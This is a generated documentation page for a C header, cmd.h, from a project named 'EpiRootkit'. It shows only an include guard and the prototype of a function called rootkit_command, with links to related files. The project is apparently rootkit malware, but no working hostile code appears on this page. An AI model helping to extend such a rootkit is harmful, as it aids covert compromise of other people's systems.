EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
cmd.h
Go to the documentation of this file.
1
#ifndef CMD_H
2
#define CMD_H
3
4
int
rootkit_command
(
char
*
command
,
unsigned
command_size,
enum
Protocol
protocol);
5
6
#endif
/* CMD_H */
rootkit_command
int rootkit_command(char *command, unsigned command_size, enum Protocol protocol)
Definition
cmd.c:122
Protocol
Protocol
Definition
config.h:28
command
Definition
epirootkit.h:26